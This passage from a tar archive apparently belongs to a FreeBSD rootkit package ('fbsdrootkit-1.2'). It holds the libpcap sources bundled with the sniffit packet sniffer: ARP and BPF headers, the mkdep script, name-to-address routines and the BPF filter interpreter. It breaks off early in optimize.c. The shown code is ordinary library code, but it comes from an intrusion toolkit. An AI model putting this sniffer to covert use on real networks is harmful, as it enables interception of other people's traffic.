dfdf/* @(#)if_arp.h 1.5 88/08/19 SMI; from UCB 7.1 1/24/86 */ /* * Copyright (c) 1986 Regents of the University of California. * All rights reserved. The Berkeley software License Agreement * specifies the terms and conditions for redistribution. */ #ifndef _net_if_arp_h #define _net_if_arp_h /* * Address Resolution Protocol. * * See RFC 826 for protocol description. ARP packets are variable * in size; the arphdr structure defines the fixed-length portion. * Protocol type values are the same as those for 10 Mb/s Ethernet. * It is followed by the variable-sized fields ar_sha, arp_spa, * arp_tha and arp_tpa in that order, according to the lengths * specified. Field names used correspond to RFC 826. */ struct arphdr { u_short ar_hrd; /* format of hardware address */ #define ARPHRD_ETHER 1 /* ethernet hardware address */ u_short ar_pro; /* format of protocol address */ u_char ar_hln; /* length of hardware address */ u_char ar_pln; /* length of protocol address */ u_short ar_op; /* one of: */ #define ARPOP_REQUEST 1 /* request to resolve address */ #define ARPOP_REPLY 2 /* response to previous request */ #define REVARP_REQUEST 3 /* Reverse ARP request */ #define REVARP_REPLY 4 /* Reverse ARP reply */ /* * The remaining fields are variable in size, * according to the sizes above, and are defined * as appropriate for specific hardware/protocol * combinations. (E.g., see .) */ #ifdef notdef u_char ar_sha[]; /* sender hardware address */ u_char ar_spa[]; /* sender protocol address */ u_char ar_tha[]; /* target hardware address */ u_char ar_tpa[]; /* target protocol address */ #endif notdef }; #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/mkdep100500 764 764 4333 6226213210 15666 0ustar dfdf#!/bin/sh - # # Copyright (c) 1987 Regents of the University of California. # All rights reserved. # # Redistribution and use in source and binary forms are permitted # provided that this notice is preserved and that due credit is given # to the University of California at Berkeley. The name of the University # may not be used to endorse or promote products derived from this # software without specific prior written permission. This software # is provided ``as is'' without express or implied warranty. # # @(#)mkdep.sh 5.11 (Berkeley) 5/5/88 # PATH=/bin:/usr/bin:/usr/ucb:/usr/local:/usr/local/bin export PATH MAKE=Makefile # default makefile name is "Makefile" CC=cc # default C compiler is "cc" while : do case "$1" in # -c allows you to specify the C compiler -c) CC=$2 shift; shift ;; # -f allows you to select a makefile name -f) MAKE=$2 shift; shift ;; # the -p flag produces "program: program.c" style dependencies # so .o's don't get produced -p) SED='s;\.o;;' shift ;; *) break ;; esac done if [ $# = 0 ] ; then echo 'usage: mkdep [-p] [-c cc] [-f makefile] [flags] file ...' exit 1 fi if [ ! -w $MAKE ]; then echo "mkdep: no writeable file \"$MAKE\"" exit 1 fi TMP=/tmp/mkdep$$ trap 'rm -f $TMP ; exit 1' 1 2 3 13 15 cp $MAKE ${MAKE}.bak sed -e '/DO NOT DELETE THIS LINE/,$d' < $MAKE > $TMP cat << _EOF_ >> $TMP # DO NOT DELETE THIS LINE -- mkdep uses it. # DO NOT PUT ANYTHING AFTER THIS LINE, IT WILL GO AWAY. _EOF_ # If your compiler doesn't have -M, add it. If you can't, the next two # lines will try and replace the "cc -M". The real problem is that this # hack can't deal with anything that requires a search path, and doesn't # even try for anything using bracket (<>) syntax. # # egrep '^#include[ ]*".*"' /dev/null $* | # sed -e 's/:[^"]*"\([^"]*\)".*/: \1/' -e 's/\.c/.o/' | $CC -M $* | sed " s; \./; ;g $SED" | awk '{ if ($1 != prev) { if (rec != "") print rec; rec = $0; prev = $1; } else { if (length(rec $2) > 78) { print rec; rec = $0; } else rec = rec " " $2 } } END { print rec }' >> $TMP cat << _EOF_ >> $TMP # IF YOU PUT ANYTHING HERE IT WILL GO AWAY _EOF_ # copy to preserve permissions cp $TMP $MAKE rm -f ${MAKE}.bak $TMP exit 0 fbsdrootkit-1.2/sniffit.0.3.3/libpcap/nametoaddr.c100400 764 764 16225 6226213210 17147 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * Name to id translation routines used by the scanner. * These functions are not time critical. */ #ifndef lint static char rcsid[] = "@(#) $Header: nametoaddr.c,v 1.21 94/06/20 19:07:54 leres Exp $ (LBL)"; #endif #include #include #include #include #include #include #include #include #include #include #include #include #include "gencode.h" #ifndef __GNUC__ #define inline #endif #ifndef NTOHL #define NTOHL(x) (x) = ntohl(x) #define NTOHS(x) (x) = ntohs(x) #endif static inline int xdtoi(int); /* * Convert host name to internet address. * Return 0 upon failure. */ u_long ** pcap_nametoaddr(const char *name) { #ifndef h_addr static u_long *hlist[2]; #endif u_long **p; struct hostent *hp; if ((hp = gethostbyname(name)) != NULL) { #ifndef h_addr hlist[0] = (u_long *)hp->h_addr; NTOHL(hp->h_addr); return hlist; #else for (p = (u_long **)hp->h_addr_list; *p; ++p) NTOHL(**p); return (u_long **)hp->h_addr_list; #endif } else return 0; } /* * Convert net name to internet address. * Return 0 upon failure. */ u_long pcap_nametonetaddr(const char *name) { struct netent *np; if ((np = getnetbyname(name)) != NULL) return np->n_net; else return 0; } /* * Convert a port name to its port and protocol numbers. * We assume only TCP or UDP. * Return 0 upon failure. */ int pcap_nametoport(const char *name, int *port, int *proto) { struct servent *sp; char *other; sp = getservbyname(name, (char *)0); if (sp != NULL) { NTOHS(sp->s_port); *port = sp->s_port; *proto = pcap_nametoproto(sp->s_proto); /* * We need to check /etc/services for ambiguous entries. * If we find the ambiguous entry, and it has the * same port number, change the proto to PROTO_UNDEF * so both TCP and UDP will be checked. */ if (*proto == IPPROTO_TCP) other = "udp"; else other = "tcp"; sp = getservbyname(name, other); if (sp != 0) { NTOHS(sp->s_port); if (*port != sp->s_port) /* Can't handle ambiguous names that refer to different port numbers. */ #ifdef notdef warning("ambiguous port %s in /etc/services", name); #else ; #endif *proto = PROTO_UNDEF; } return 1; } #if defined(ultrix) || defined(__osf__) /* Special hack in case NFS isn't in /etc/services */ if (strcmp(name, "nfs") == 0) { *port = 2049; *proto = PROTO_UNDEF; return 1; } #endif return 0; } int pcap_nametoproto(const char *str) { struct protoent *p; p = getprotobyname(str); if (p != 0) return p->p_proto; else return PROTO_UNDEF; } #include "ethertype.h" struct eproto { char *s; u_short p; }; /* Static data base of ether protocol types. */ struct eproto eproto_db[] = { { "pup", ETHERTYPE_PUP }, { "xns", ETHERTYPE_NS }, { "ip", ETHERTYPE_IP }, { "arp", ETHERTYPE_ARP }, { "rarp", ETHERTYPE_REVARP }, { "sprite", ETHERTYPE_SPRITE }, { "mopdl", ETHERTYPE_MOPDL }, { "moprc", ETHERTYPE_MOPRC }, { "decnet", ETHERTYPE_DN }, { "lat", ETHERTYPE_LAT }, { "lanbridge", ETHERTYPE_LANBRIDGE }, { "vexp", ETHERTYPE_VEXP }, { "vprod", ETHERTYPE_VPROD }, { "atalk", ETHERTYPE_ATALK }, { "atalkarp", ETHERTYPE_AARP }, { "loopback", ETHERTYPE_LOOPBACK }, { "decdts", ETHERTYPE_DECDTS }, { "decdns", ETHERTYPE_DECDNS }, { (char *)0, 0 } }; int pcap_nametoeproto(const char *s) { struct eproto *p = eproto_db; while (p->s != 0) { if (strcmp(p->s, s) == 0) return p->p; p += 1; } return PROTO_UNDEF; } /* Hex digit to integer. */ static inline int xdtoi(c) register int c; { if (isdigit(c)) return c - '0'; else if (islower(c)) return c - 'a' + 10; else return c - 'A' + 10; } u_long __pcap_atoin(const char *s) { u_long addr = 0; u_int n; while (1) { n = 0; while (*s && *s != '.') n = n * 10 + *s++ - '0'; addr <<= 8; addr |= n & 0xff; if (*s == '\0') return addr; ++s; } /* NOTREACHED */ } u_long __pcap_atodn(const char *s) { #define AREASHIFT 10 #define AREAMASK 0176000 #define NODEMASK 01777 u_long addr = 0; u_int node, area; if (sscanf((char *)s, "%d.%d", &area, &node) != 2) bpf_error("malformed decnet address '%s'", s); addr = (area << AREASHIFT) & AREAMASK; addr |= (node & NODEMASK); return(addr); } /* * Convert 's' which has the form "xx:xx:xx:xx:xx:xx" into a new * ethernet address. Assumes 's' is well formed. */ u_char * pcap_ether_aton(const char *s) { register u_char *ep, *e; register u_int d; e = ep = (u_char *)malloc(6); while (*s) { if (*s == ':') s += 1; d = xdtoi(*s++); if (isxdigit(*s)) { d <<= 4; d |= xdtoi(*s++); } *ep++ = d; } return (e); } #ifndef ETHER_SERVICE /* Roll our own */ u_char * pcap_ether_hostton(const char *name) { register struct pcap_etherent *ep; register u_char *ap; static FILE *fp = NULL; static init = 0; if (!init) { fp = fopen(PCAP_ETHERS_FILE, "r"); ++init; if (fp == NULL) return (NULL); } else if (fp == NULL) return (NULL); else rewind(fp); while ((ep = pcap_next_etherent(fp)) != NULL) { if (strcmp(ep->name, name) == 0) { ap = (u_char *)malloc(6); if (ap != NULL) { memcpy(ap, ep->addr, 6); return (ap); } break; } } return (NULL); } #else /* Use the os supplied routines */ u_char * pcap_ether_hostton(const char *name) { register u_char *ap; u_char a[6]; #ifndef sgi extern int ether_hostton(char *, struct ether_addr *); #endif ap = NULL; if (ether_hostton((char*)name, (struct ether_addr *)a) == 0) { ap = (u_char *)malloc(6); if (ap != NULL) memcpy(ap, a, 6); } return (ap); } #endif u_short __pcap_nametodnaddr(const char *name) { #ifdef DECNETLIB struct nodeent *getnodebyname(); struct nodeent *nep; unsigned short res; nep = getnodebyname(name); if (nep == ((struct nodeent *)0)) bpf_error("unknown decnet host name '%s'\n", name); memcpy((char *)&res, (char *)nep->n_addr, sizeof(unsigned short)); return(res); #else bpf_error("decnet name support not included, '%s' cannot be translated\n", name); #endif } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/net/ 40700 764 764 0 6226213210 15330 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/net/bpf_filter.c100400 764 764 25354 6226213210 17736 0ustar dfdf/*- * Copyright (c) 1990, 1991, 1992, 1993 * The Regents of the University of California. All rights reserved. * * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)bpf.c 7.5 (Berkeley) 7/15/91 * * static char rcsid[] = * "$Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $"; */ #if !(defined(lint) || defined(KERNEL)) static char rcsid[] = "@(#) $Header: bpf_filter.c,v 1.22 94/06/05 20:12:39 leres Exp $ (LBL)"; #endif #include #include #include #include #if defined(__alpha) typedef int int32; typedef u_int u_int32; #else typedef long int32; typedef u_long u_int32; #endif #ifdef sun #include #endif #if defined(sparc) || defined(mips) || defined(ibm032) || defined(__alpha) #define BPF_ALIGN #endif #ifndef BPF_ALIGN #define EXTRACT_SHORT(p) ((u_short)ntohs(*(u_short *)p)) #define EXTRACT_LONG(p) (ntohl(*(u_int32 *)p)) #else #define EXTRACT_SHORT(p)\ ((u_short)\ ((u_short)*((u_char *)p+0)<<8|\ (u_short)*((u_char *)p+1)<<0)) #define EXTRACT_LONG(p)\ ((u_int32)*((u_char *)p+0)<<24|\ (u_int32)*((u_char *)p+1)<<16|\ (u_int32)*((u_char *)p+2)<<8|\ (u_int32)*((u_char *)p+3)<<0) #endif #ifdef KERNEL #include #define MINDEX(m, k) \ { \ register int len = m->m_len; \ \ while (k >= len) { \ k -= len; \ m = m->m_next; \ if (m == 0) \ return 0; \ len = m->m_len; \ } \ } static int m_xword(m, k, err) register struct mbuf *m; register int k, *err; { register int len; register u_char *cp, *np; register struct mbuf *m0; len = m->m_len; while (k >= len) { k -= len; m = m->m_next; if (m == 0) goto bad; len = m->m_len; } cp = mtod(m, u_char *) + k; if (len - k >= 4) { *err = 0; return EXTRACT_LONG(cp); } m0 = m->m_next; if (m0 == 0 || m0->m_len + len - k < 4) goto bad; *err = 0; np = mtod(m0, u_char *); switch (len - k) { case 1: return (cp[k] << 24) | (np[0] << 16) | (np[1] << 8) | np[2]; case 2: return (cp[k] << 24) | (cp[k + 1] << 16) | (np[0] << 8) | np[1]; default: return (cp[k] << 24) | (cp[k + 1] << 16) | (cp[k + 2] << 8) | np[0]; } bad: *err = 1; return 0; } static int m_xhalf(m, k, err) register struct mbuf *m; register int k, *err; { register int len; register u_char *cp; register struct mbuf *m0; len = m->m_len; while (k >= len) { k -= len; m = m->m_next; if (m == 0) goto bad; len = m->m_len; } cp = mtod(m, u_char *) + k; if (len - k >= 2) { *err = 0; return EXTRACT_SHORT(cp); } m0 = m->m_next; if (m0 == 0) goto bad; *err = 0; return (cp[k] << 8) | mtod(m0, u_char *)[0]; bad: *err = 1; return 0; } #endif /* * Execute the filter program starting at pc on the packet p * wirelen is the length of the original packet * buflen is the amount of data present */ u_int bpf_filter(pc, p, wirelen, buflen) register struct bpf_insn *pc; register u_char *p; u_int wirelen; register u_int buflen; { register u_int32 A, X; register int k; int32 mem[BPF_MEMWORDS]; if (pc == 0) /* * No filter means accept all. */ return (u_int)-1; #ifdef lint A = 0; X = 0; #endif --pc; while (1) { ++pc; switch (pc->code) { default: #ifdef KERNEL return 0; #else abort(); #endif case BPF_RET|BPF_K: return (u_int)pc->k; case BPF_RET|BPF_A: return (u_int)A; case BPF_LD|BPF_W|BPF_ABS: k = pc->k; if (k + sizeof(int32) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xword((struct mbuf *)p, k, &merr); if (merr != 0) return 0; continue; #else return 0; #endif } A = EXTRACT_LONG(&p[k]); continue; case BPF_LD|BPF_H|BPF_ABS: k = pc->k; if (k + sizeof(short) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xhalf((struct mbuf *)p, k, &merr); continue; #else return 0; #endif } A = EXTRACT_SHORT(&p[k]); continue; case BPF_LD|BPF_B|BPF_ABS: k = pc->k; if (k >= buflen) { #ifdef KERNEL register struct mbuf *m; if (buflen != 0) return 0; m = (struct mbuf *)p; MINDEX(m, k); A = mtod(m, u_char *)[k]; continue; #else return 0; #endif } A = p[k]; continue; case BPF_LD|BPF_W|BPF_LEN: A = wirelen; continue; case BPF_LDX|BPF_W|BPF_LEN: X = wirelen; continue; case BPF_LD|BPF_W|BPF_IND: k = X + pc->k; if (k + sizeof(int32) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xword((struct mbuf *)p, k, &merr); if (merr != 0) return 0; continue; #else return 0; #endif } A = EXTRACT_LONG(&p[k]); continue; case BPF_LD|BPF_H|BPF_IND: k = X + pc->k; if (k + sizeof(short) > buflen) { #ifdef KERNEL int merr; if (buflen != 0) return 0; A = m_xhalf((struct mbuf *)p, k, &merr); if (merr != 0) return 0; continue; #else return 0; #endif } A = EXTRACT_SHORT(&p[k]); continue; case BPF_LD|BPF_B|BPF_IND: k = X + pc->k; if (k >= buflen) { #ifdef KERNEL register struct mbuf *m; if (buflen != 0) return 0; m = (struct mbuf *)p; MINDEX(m, k); A = mtod(m, char *)[k]; continue; #else return 0; #endif } A = p[k]; continue; case BPF_LDX|BPF_MSH|BPF_B: k = pc->k; if (k >= buflen) { #ifdef KERNEL register struct mbuf *m; if (buflen != 0) return 0; m = (struct mbuf *)p; MINDEX(m, k); X = (mtod(m, char *)[k] & 0xf) << 2; continue; #else return 0; #endif } X = (p[pc->k] & 0xf) << 2; continue; case BPF_LD|BPF_IMM: A = pc->k; continue; case BPF_LDX|BPF_IMM: X = pc->k; continue; case BPF_LD|BPF_MEM: A = mem[pc->k]; continue; case BPF_LDX|BPF_MEM: X = mem[pc->k]; continue; case BPF_ST: mem[pc->k] = A; continue; case BPF_STX: mem[pc->k] = X; continue; case BPF_JMP|BPF_JA: pc += pc->k; continue; case BPF_JMP|BPF_JGT|BPF_K: pc += (A > pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JGE|BPF_K: pc += (A >= pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JEQ|BPF_K: pc += (A == pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JSET|BPF_K: pc += (A & pc->k) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JGT|BPF_X: pc += (A > X) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JGE|BPF_X: pc += (A >= X) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JEQ|BPF_X: pc += (A == X) ? pc->jt : pc->jf; continue; case BPF_JMP|BPF_JSET|BPF_X: pc += (A & X) ? pc->jt : pc->jf; continue; case BPF_ALU|BPF_ADD|BPF_X: A += X; continue; case BPF_ALU|BPF_SUB|BPF_X: A -= X; continue; case BPF_ALU|BPF_MUL|BPF_X: A *= X; continue; case BPF_ALU|BPF_DIV|BPF_X: if (X == 0) return 0; A /= X; continue; case BPF_ALU|BPF_AND|BPF_X: A &= X; continue; case BPF_ALU|BPF_OR|BPF_X: A |= X; continue; case BPF_ALU|BPF_LSH|BPF_X: A <<= X; continue; case BPF_ALU|BPF_RSH|BPF_X: A >>= X; continue; case BPF_ALU|BPF_ADD|BPF_K: A += pc->k; continue; case BPF_ALU|BPF_SUB|BPF_K: A -= pc->k; continue; case BPF_ALU|BPF_MUL|BPF_K: A *= pc->k; continue; case BPF_ALU|BPF_DIV|BPF_K: A /= pc->k; continue; case BPF_ALU|BPF_AND|BPF_K: A &= pc->k; continue; case BPF_ALU|BPF_OR|BPF_K: A |= pc->k; continue; case BPF_ALU|BPF_LSH|BPF_K: A <<= pc->k; continue; case BPF_ALU|BPF_RSH|BPF_K: A >>= pc->k; continue; case BPF_ALU|BPF_NEG: A = -A; continue; case BPF_MISC|BPF_TAX: X = A; continue; case BPF_MISC|BPF_TXA: A = X; continue; } } } #ifdef KERNEL /* * Return true if the 'fcode' is a valid filter program. * The constraints are that each jump be forward and to a valid * code. The code must terminate with either an accept or reject. * 'valid' is an array for use by the routine (it must be at least * 'len' bytes long). * * The kernel needs to be able to verify an application's filter code. * Otherwise, a bogus program could easily crash the system. */ int bpf_validate(f, len) struct bpf_insn *f; int len; { register int i; register struct bpf_insn *p; for (i = 0; i < len; ++i) { /* * Check that that jumps are forward, and within * the code block. */ p = &f[i]; if (BPF_CLASS(p->code) == BPF_JMP) { register int from = i + 1; if (BPF_OP(p->code) == BPF_JA) { if (from + p->k >= len) return 0; } else if (from + p->jt >= len || from + p->jf >= len) return 0; } /* * Check that memory operations use valid addresses. */ if ((BPF_CLASS(p->code) == BPF_ST || (BPF_CLASS(p->code) == BPF_LD && (p->code & 0xe0) == BPF_MEM)) && (p->k >= BPF_MEMWORDS || p->k < 0)) return 0; /* * Check for constant division by 0. */ if (p->code == (BPF_ALU|BPF_DIV|BPF_K) && p->k == 0) return 0; } return BPF_CLASS(f[len - 1].code) == BPF_RET; } #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/net/bpf.h100600 764 764 17465 6226213210 16404 0ustar dfdf/*- * Copyright (c) 1990-1991 The Regents of the University of California. * All rights reserved. * * This code is derived from the Stanford/CMU enet packet filter, * (net/enet.c) distributed as part of 4.3BSD, and code contributed * to Berkeley by Steven McCanne and Van Jacobson both of Lawrence * Berkeley Laboratory. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)bpf.h 7.1 (Berkeley) 5/7/91 * * @(#) $Header: bpf.h,v 1.28 93/12/11 00:49:46 mccanne Locked $ (LBL) */ #ifndef BPF_MAJOR_VERSION /* BSD style release date */ #define BPF_RELEASE 199406 #if defined(__alpha) typedef int bpf_int32; typedef u_int bpf_u_int32; #else typedef long bpf_int32; typedef u_long bpf_u_int32; #endif /* * Alignment macros. BPF_WORDALIGN rounds up to the next * even multiple of BPF_ALIGNMENT. */ #define BPF_ALIGNMENT sizeof(long) #define BPF_WORDALIGN(x) (((x)+(BPF_ALIGNMENT-1))&~(BPF_ALIGNMENT-1)) #define BPF_MAXINSNS 512 #define BPF_MAXBUFSIZE 0x8000 #define BPF_MINBUFSIZE 32 /* * Structure for BIOCSETF. */ struct bpf_program { u_int bf_len; struct bpf_insn *bf_insns; }; /* * Struct returned by BIOCGSTATS. */ struct bpf_stat { u_int bs_recv; /* number of packets received */ u_int bs_drop; /* number of packets dropped */ }; /* * Struct return by BIOCVERSION. This represents the version number of * the filter language described by the instruction encodings below. * bpf understands a program iff kernel_major == filter_major && * kernel_minor >= filter_minor, that is, if the value returned by the * running kernel has the same major number and a minor number equal * equal to or less than the filter being downloaded. Otherwise, the * results are undefined, meaning an error may be returned or packets * may be accepted haphazardly. * It has nothing to do with the source code version. */ struct bpf_version { u_short bv_major; u_short bv_minor; }; /* Current version number of filter architecture. */ #define BPF_MAJOR_VERSION 1 #define BPF_MINOR_VERSION 1 /* * BPF ioctls * * The first set is for compatibility with Sun's pcc style * header files. If your using gcc, we assume that you * have run fixincludes so the latter set should work. */ #if (defined(sun) || defined(ibm032)) && !defined(__GNUC__) #define BIOCGBLEN _IOR(B,102, u_int) #define BIOCSBLEN _IOWR(B,102, u_int) #define BIOCSETF _IOW(B,103, struct bpf_program) #define BIOCFLUSH _IO(B,104) #define BIOCPROMISC _IO(B,105) #define BIOCGDLT _IOR(B,106, u_int) #define BIOCGETIF _IOR(B,107, struct ifreq) #define BIOCSETIF _IOW(B,108, struct ifreq) #define BIOCSRTIMEOUT _IOW(B,109, struct timeval) #define BIOCGRTIMEOUT _IOR(B,110, struct timeval) #define BIOCGSTATS _IOR(B,111, struct bpf_stat) #define BIOCIMMEDIATE _IOW(B,112, u_int) #define BIOCVERSION _IOR(B,113, struct bpf_version) #else #define BIOCGBLEN _IOR('B',102, u_int) #define BIOCSBLEN _IOWR('B',102, u_int) #define BIOCSETF _IOW('B',103, struct bpf_program) #define BIOCFLUSH _IO('B',104) #define BIOCPROMISC _IO('B',105) #define BIOCGDLT _IOR('B',106, u_int) #define BIOCGETIF _IOR('B',107, struct ifreq) #define BIOCSETIF _IOW('B',108, struct ifreq) #define BIOCSRTIMEOUT _IOW('B',109, struct timeval) #define BIOCGRTIMEOUT _IOR('B',110, struct timeval) #define BIOCGSTATS _IOR('B',111, struct bpf_stat) #define BIOCIMMEDIATE _IOW('B',112, u_int) #define BIOCVERSION _IOR('B',113, struct bpf_version) #endif /* * Structure prepended to each packet. */ struct bpf_hdr { struct timeval bh_tstamp; /* time stamp */ bpf_u_int32 bh_caplen; /* length of captured portion */ bpf_u_int32 bh_datalen; /* original length of packet */ u_short bh_hdrlen; /* length of bpf header (this struct plus alignment padding) */ }; /* * Because the structure above is not a multiple of 4 bytes, some compilers * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work. * Only the kernel needs to know about it; applications use bh_hdrlen. */ #ifdef KERNEL #define SIZEOF_BPF_HDR 18 #endif /* * Data-link level type codes. */ #define DLT_NULL 0 /* no link-layer encapsulation */ #define DLT_EN10MB 1 /* Ethernet (10Mb) */ #define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */ #define DLT_AX25 3 /* Amateur Radio AX.25 */ #define DLT_PRONET 4 /* Proteon ProNET Token Ring */ #define DLT_CHAOS 5 /* Chaos */ #define DLT_IEEE802 6 /* IEEE 802 Networks */ #define DLT_ARCNET 7 /* ARCNET */ #define DLT_SLIP 8 /* Serial Line IP */ #define DLT_PPP 9 /* Point-to-point Protocol */ #define DLT_FDDI 10 /* FDDI */ /* * The instruction encondings. */ /* instruction classes */ #define BPF_CLASS(code) ((code) & 0x07) #define BPF_LD 0x00 #define BPF_LDX 0x01 #define BPF_ST 0x02 #define BPF_STX 0x03 #define BPF_ALU 0x04 #define BPF_JMP 0x05 #define BPF_RET 0x06 #define BPF_MISC 0x07 /* ld/ldx fields */ #define BPF_SIZE(code) ((code) & 0x18) #define BPF_W 0x00 #define BPF_H 0x08 #define BPF_B 0x10 #define BPF_MODE(code) ((code) & 0xe0) #define BPF_IMM 0x00 #define BPF_ABS 0x20 #define BPF_IND 0x40 #define BPF_MEM 0x60 #define BPF_LEN 0x80 #define BPF_MSH 0xa0 /* alu/jmp fields */ #define BPF_OP(code) ((code) & 0xf0) #define BPF_ADD 0x00 #define BPF_SUB 0x10 #define BPF_MUL 0x20 #define BPF_DIV 0x30 #define BPF_OR 0x40 #define BPF_AND 0x50 #define BPF_LSH 0x60 #define BPF_RSH 0x70 #define BPF_NEG 0x80 #define BPF_JA 0x00 #define BPF_JEQ 0x10 #define BPF_JGT 0x20 #define BPF_JGE 0x30 #define BPF_JSET 0x40 #define BPF_SRC(code) ((code) & 0x08) #define BPF_K 0x00 #define BPF_X 0x08 /* ret - BPF_K and BPF_X also apply */ #define BPF_RVAL(code) ((code) & 0x18) #define BPF_A 0x10 /* misc */ #define BPF_MISCOP(code) ((code) & 0xf8) #define BPF_TAX 0x00 #define BPF_TXA 0x80 /* * The instruction data structure. */ struct bpf_insn { u_short code; u_char jt; u_char jf; bpf_int32 k; }; /* * Macros for insn array initializers. */ #define BPF_STMT(code, k) { (u_short)(code), 0, 0, k } #define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k } #ifdef KERNEL extern u_int bpf_filter(); extern void bpfattach(); extern void bpf_tap(); extern void bpf_mtap(); #endif /* * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST). */ #define BPF_MEMWORDS 16 #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/optimize.c100400 764 764 113451 6226213210 16710 0ustar dfdf/* * Copyright (c) 1988, 1989, 1990, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * Optimization module for tcpdump intermediate representation. */ #ifndef lint static char rcsid[] = "@(#) $Header: optimize.c,v 1.45 94/06/20 19:07:55 leres Exp $ (LBL)"; #endif #include #include #include #include #ifdef __osf__ #include #include #endif #include #include "gencode.h" #ifndef 